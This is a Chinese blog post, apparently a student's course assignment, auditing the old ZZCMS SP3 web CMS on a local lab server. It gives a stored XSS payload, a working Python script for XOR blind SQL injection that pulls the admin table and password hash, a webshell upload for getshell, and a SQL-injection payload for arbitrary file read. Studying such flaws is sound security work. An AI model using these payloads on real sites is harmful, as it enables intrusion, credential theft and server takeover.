zzcms SP3 漏洞解析

最新推荐文章于 2024-04-30 11:29:45 发布
最新推荐文章于 2024-04-30 11:29:45 发布
阅读量3.5k 收藏 1
点赞数 2
分类专栏: 内网渗透 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/121942627
版权

zzcms SP3 漏洞解析

cms来源:
ZZCMS SP3
URL: www.zzcms.com
作者:壮壮

很老的cms版本,应该没人会用了吧,这里找找简单地漏洞(课程期末作业)

有使用seay扫描器扫描,但误报率高,只能简单的参考,实际还是得自己动手看代码(…)


1.xss储存型漏洞
范围:Book.php留言界面

测试后:
有轻微的参数过滤痕迹,但并不完全,还是能简单的在管理页面执行恶意xss代码

恶意代码js:

<IMG SRC="javascript:alert(1);" ONERROR="alert(1)">

留言界面:
xss储存型
管理界面:
xss储存型
没错,当管理员打开留言管理,会直接触发xss代码,虽然这里只是alert(1)的测试,
但如果是获取cookie的xss代码呢?没错,cookie可以直接登录到后台

2.变量存在异或盲注漏洞
范围:“文章中心”、“产品中心”、“关于我们”

测试:

Art_Show.php?id=0^(length(database())>=4)   //正常
Art_Show.php?id=0^(length(database())>=5)   //报错
//数据库名字为4

脚本盲注就行

import requests
import time

url="http://192.168.241.188/zzcms/Art_Show.php?id="
name=''


for i in range(1,80):
    print(i)
    low=31
    high=127
    mid=(low+high)//2
    while low<high:
        payload = "0^(ascii(substr((select(database())),%d,1))>%d)" % (i, mid)
        #payload = "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)"%(i,mid)
        #payload = "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='zzcms_admin')),%d,1))>%d)"%(i,mid)
        #payload = "0^(ascii(substr((select(group_concat(name,password,grade))from(zzcms_admin)),%d,1))>%d)"%(i,mid)
        
        r = requests.get(url+payload)
        print(payload)
        if 'cyber' in r.text:   #cyber为文章内容,一旦正常返回,则字符爆破正确
            low = mid+1
        else:
            high=mid
        mid=(low+high)//2
        if(mid==32):
            break
    name=name+chr(mid)
    print (name)
  1. 爆出所使用数据库为:test
  2. 爆出所有的表名为:zzcms_about,zzcms_access,zzcms_admin,
    zzcms_article,zzcms_book,zzcms_botlist,zzc....(脚本在多循环几次,就全部出来了,这里循环了80次)
  3. 你说我对哪张表感兴趣,当然是用户表:zzcms_admin
    爆出的zzcms_admin字段有:id,uid,name,password,grade
  4. 只提取可能有价值的字段值
    爆出的name,password,grade值为:admin,441de0cf505e227b6eb49446d5a69269,1
    MD5加密可不是好习惯,没错,账号admin,密码passwordzzcms,等级1

盲注

PS:这里的密码是md5(密码+zzcms),登录时admin和password就能登录

3.后台管理存在文件上传漏洞
范围:管理后台能文件上传的地方

虽然这是拿到后台才能有的操作,但可以是getshell的关键
这个漏洞过于简单,图片马上传抓包改后缀就行
upload_1
访问http://192.168.241.188/zzcms/upload/2021-12-14/1639493237.php确认存在且能解析
upload_2
蚁剑连接,直接getshell
getshell

4.任意文件读取(sql注入的任意文件读取)
范围:“软件下载”

"软件下载"界面通过downfile.php?id=来寻找文件,并将找到的文件内容复制下来给客户端
downfile.php代码审计:
代码审计

payload:

downfile.php?id=-1 union select 'index.php'

没错,直接下载根目录下的index.php,甚至其他路径的文件也能读取
任意文件读取
5.fck编辑器2.6.4.1(感觉都是漏洞,总之先鸽了)

伽蓝之堂
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Zzzcms 1.75后台地址泄露
09-07
ZZZCMS parserSearch 远程命令执行漏洞和parserSearch 存在模板注入导致远程命令执行漏洞## **二、复现过程** 存在一个比较奇葩的文件直接将一些属于不可访问的zzz_config.php的内容直接给回显了,该信息泄露文件位于plugins/webuploader/js/webconfig.php,可以直接获取到管理后台的管理路径名称,再也不用去爆破admin加3位数字了 通过访问。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
zzcms 任意用户修改密码
Z_l123的博客
03-03 245
任意用户修改密码 方式一 先注册个账号,然后首页点击找回密码 这里还存在用户遍历,如果存在该用户,那么返回在前端页面的就是如下所述的正确的状态 抓包,点击下一步 将step1改为step2,放包即可跳过安全验证 方式二 点击下一步 验证码随意注入,一定快速输入,不然会发包后端会做验证,在显示 这样的红色警告字符之前点击下一步 ...
zzcms审计-另类的漏洞
最新发布
2301_80127209的博客
04-30 217
ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/他这里最根本的原因就是利用cookie去获取要删除的数据表,却没有对用户可以传入的数据表名字进行限制,这样就导致了可以删除随便哪一张表,只要这个数据表里面含有id这个字段。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。二、漏洞发现过程分析。
ZZCMS漏洞复现和代码审计
qq_48511129的博客
01-25 6635
ZZCMS漏洞复现和代码审计
PHP代码审计-从安装到开始_1
帅醉了的博客
09-13 371
1
[漏洞复现]zzcms8.2#任意用户密码重置#del.php时间盲注#复现
weixin_30892987的博客
02-14 256
00x0 引言   早上起来,发现seebug更新了一批新的洞,    发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~)    环境:zzcms8.2(产品招商型)      php-5.4.45 .    mysql-5.5.53 01x0 任意用户密码重置   01x1 任意用户密码重置方式一     话...
ZZCMS8.2 用户密码重置漏洞
weixin_30363509的博客
08-03 456
前言 一个找回密码处的逻辑漏洞, 还是有点意思的。 正文 首先是定位找回密码功能对应的代码位置,使用找回密码的功能,然后抓包即可 下面去 getpassword.php 里面看看, 首先包含了一些文件 在 conn.php 中,包含了 stopsqlin.php 会对参数进行过滤操作。 stopsqlin.php 中对参数的过滤 回到getpassword.php , 文件后面就开始进入 ...
ZZCMS代码审计
weixin_55967300的博客
02-16 275
代码审计
代码审计-zzcms2021前台写shell-复现与理解
giaogiao123的博客
11-06 666
实验环境 phpstorm 2018 +xdebug (动态调试) burp(hackbar不大行) phpstudy(5.5.38) 我们来看一下漏洞的主要地方 payload POST /zzcms2021/zzcms2021/3/ucenter_api/api/uc.php?code=e33cwZ1KOYMpjjKGhPu7avvOo6fuX2GfQ3bUoYN55lxTZFUVgLk6vtNqDKWVW7OLP/qq1DWgCdCxRhNmzfM HTTP/1.1 Host: 127.0.0.1
ZZZPHP1.61 代码审计-从SQL注入到Getshell
dfdhxb995397的博客
04-18 440
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅! 注:文章还是原来的方式,先复现后分析,阅读用时约7分...
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
zzcms8.1.7z
11-24
zzcms v8.1
zzcms网站管理系统 v1.0 sp3.rar
07-06
ZZCMS是一款小巧,高效,人性化的企业建站程序. 目前具有模块:单页、文章、产品、下载、友情连接、留言本、伪原创、记录蜘蛛等功能 采用缓存技术让速度更快 栏目为多级分类 留言可在后台设置是否通过审核的留言 ...
zzcms201910源码包(免费下载)
10-28
资源有点难找 全是需要积分或者下载券的 这里放一个免费的 供大家审计使用
zzcms8.2任意用户修改密码漏洞
Snowflake1997的博客
03-03 340
1.在登录界面点击密码找回。 2.输入用户名以及验证码 进入安全验证界面时,打开burpsuite进行抓包,点击获取验证码 3.验证码为1151 4.输入后进入设置新密码
phpinfo函数无法执行_再谈 zzzcms 代码执行,你也能审计出来的高危漏洞
weixin_39631350的博客
12-21 284
本文作者:sher10ckzzzcms 的后台模板处的命令执行可以说是这套 CMS 比较典型的漏洞了,很久之前自己跟踪过一遍漏洞代码,最近又拿起来玩了玩,发现自己也能够审计到这个漏洞点,整个漏洞审计的过程也很简单,没有啥骚操作。下面我就会按照审计的思路,而并非漏洞分析的思路,给大家说说我是如何通过自己的努力审计出这个命令执行漏洞cms 下载地址:https://yunpan.360.c...
Web漏洞之——文件上传漏洞
weixin_64021878的博客
03-31 511
zzcms的文件上传漏洞,你可以利用这个漏洞,获取你想要的
ecmslogin.php,代码审计——zcncms几处漏洞合集(二)
weixin_39723899的博客
03-25 538
from:小黑屋继上一篇参数$parentid未正确处理后,在/module/products/admincontroller/products_photo.php中,switch($a){case 'list':default://list//列表if (empty($productid)) {$where = ' 1 = 1 ';} else {$where = " productid = '...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值